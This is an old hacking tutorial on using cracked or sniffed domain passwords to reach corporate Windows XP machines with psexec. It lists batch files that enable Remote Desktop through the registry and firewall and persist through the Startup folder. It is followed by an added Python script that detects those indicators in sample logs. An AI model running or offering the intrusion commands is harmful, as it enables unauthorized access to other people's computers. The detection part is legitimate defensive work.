Accessing WinXP Pro computers in a corporate environment.
In most corporate environments all the XP boxes are on a domain, which means their credentials are constantly in transit across the network. Let's say you got some Windows password hashes and cracked them, as in my last tutorial.
Or let's say you got some cleartext passwords from some HTTP traffic and you think those passwords are the same as the Windows passwords.
Typically on corporate machines RDP is enabled, but if it isn't you can use psexec to get a foot in the door.
http://www.microsoft.com/technet/sysinternals/security/psexec.mspx
Open the cmd prompt by hitting Start > Run, typing cmd, then hitting Enter.
Type this into the cmd prompt (make sure you are in the directory that psexec is in when you do this, or add psexec to the system path):
psexec \\machinename -u username cmd
It will prompt you for the password, which you have conveniently commandeered. Note that username should be the actual account name, not the literal word "username". This will start a command prompt on your machine that is actually running on the other machine, so you now have \\machinename's cmd prompt open. You can do any of your normal command prompt stuff from here. psexec has an option for copying a file up when you run it, but it is a little tricky. What I do instead is use the net command to map a drive from the other computer back to your computer. Like so:
net use r: \\breadstick\public /persistent:no
This will map drive r: to the shared folder named public on the computer breadstick. So now you can just type (remember, this is in the other computer's cmd prompt, not your own):
r:
to access it.
From there you can run a silent install of VNC for some sweet GUI action, or, if you know no one is actually in front of the computer, you can create these three .bat files and run first.bat.
Make three .bat files in the same directory on a thumb drive:
first.bat
code:
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
mkdir c:\batter
copy second.bat c:\batter
copy third.bat c:\batter
cd "%USERPROFILE%\Start Menu\Programs\Startup"
copy c:\batter\second.bat start.bat
shutdown -r -t 0
second.bat
code:
netsh firewall set portopening tcp 3389 "RemoteDesktop"
cd c:\batter
third.bat
third.bat
code:
cd "%USERPROFILE%\Start Menu\Programs\Startup"
del start.bat
This enables Remote Desktop on that machine (registry flag flipped, then port 3389 opened in the Windows Firewall after the reboot) so that you can remote into it.
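From a defender's side, the sequence above leaves a distinctive trail on the target: a PSEXESVC service install, a write to fDenyTSConnections, a file dropped in (and later deleted from) a user's Startup folder, a reboot, and a firewall opening for TCP 3389. The following script is an added detection example, not code from the original post; it scans a handful of constructed audit lines in an assumed "<timestamp> <host> <source>: <message>" format (real Windows event log and Sysmon records are shaped differently, so the regexes would need adapting) and raises an alert when several of these indicators land on one host inside a short window.

```python
"""Added example (not from the original post): correlate the host-side
indicators of the psexec + Startup-folder + RDP-enable sequence."""
import re
from dataclasses import dataclass
from datetime import datetime, timedelta

# Constructed sample log lines; the "<timestamp> <host> <source>: <message>"
# layout is an assumption for this example, not a real Windows log format.
SAMPLE_LOG = r"""2009-03-02T10:14:02 ws-017 Service: service PSEXESVC installed, binary %SystemRoot%\PSEXESVC.EXE
2009-03-02T10:14:09 ws-017 Registry: HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\fDenyTSConnections set to 0
2009-03-02T10:14:10 ws-017 File: C:\Documents and Settings\jdoe\Start Menu\Programs\Startup\start.bat created
2009-03-02T10:14:11 ws-017 Process: shutdown.exe -r -t 0
2009-03-02T10:16:40 ws-017 Firewall: port opening tcp 3389 RemoteDesktop enabled
2009-03-02T10:16:41 ws-017 File: C:\Documents and Settings\jdoe\Start Menu\Programs\Startup\start.bat deleted
2009-03-02T11:00:00 ws-017 Process: notepad.exe
"""

# One line per record: timestamp, host, source, free-text message.
LINE = re.compile(r"^(\S+) (\S+) (\w+): (.*)$")

# Each rule names one indicator from the tutorial's procedure.
RULES = [
    ("psexec_service", re.compile(r"service PSEXESVC installed", re.I)),
    ("rdp_enabled_via_registry", re.compile(r"fDenyTSConnections set to 0", re.I)),
    ("startup_folder_write", re.compile(r"\\Startup\\[^\\]+\.(bat|cmd|exe|vbs) created", re.I)),
    ("firewall_3389_opened", re.compile(r"port opening tcp 3389", re.I)),
    ("startup_folder_delete", re.compile(r"\\Startup\\[^\\]+ deleted", re.I)),
]


@dataclass(frozen=True)
class Hit:
    ts: datetime
    host: str
    rule: str
    line: str


def scan(log_text: str) -> list[Hit]:
    """Return one Hit per (line, rule) match; lines that fit no rule are dropped."""
    hits = []
    for raw in log_text.splitlines():
        m = LINE.match(raw)
        if not m:
            continue  # malformed record: skip rather than crash the scan
        ts = datetime.fromisoformat(m.group(1))
        host, msg = m.group(2), m.group(4)
        for name, pattern in RULES:
            if pattern.search(msg):
                hits.append(Hit(ts, host, name, raw))
    return hits


def correlate(hits: list[Hit], window: timedelta = timedelta(minutes=15),
              min_rules: int = 3) -> list[dict]:
    """Alert once per host when >= min_rules distinct indicators fire within window.

    A single indicator (an admin enabling RDP, say) is normal; several of them
    clustered on one host in minutes is the pattern worth a ticket.
    """
    by_host: dict[str, list[Hit]] = {}
    for h in sorted(hits, key=lambda h: h.ts):
        by_host.setdefault(h.host, []).append(h)

    alerts = []
    for host, host_hits in by_host.items():
        for i, start in enumerate(host_hits):
            in_window = [h for h in host_hits[i:] if h.ts - start.ts <= window]
            rules = sorted({h.rule for h in in_window})
            if len(rules) >= min_rules:
                alerts.append({"host": host, "first_seen": start.ts.isoformat(),
                               "rules": rules})
                break  # one alert per host is enough for triage
    return alerts


if __name__ == "__main__":
    for alert in correlate(scan(SAMPLE_LOG)):
        print(alert)
```

The reboot itself is deliberately not a rule: on its own it carries no signal, and the pairing of the registry change with the firewall change on either side of it is what the correlation window is meant to capture. In a real deployment the same logic would sit on top of Security log events for service installs and registry auditing, with the Startup-folder rule fed by file-creation telemetry.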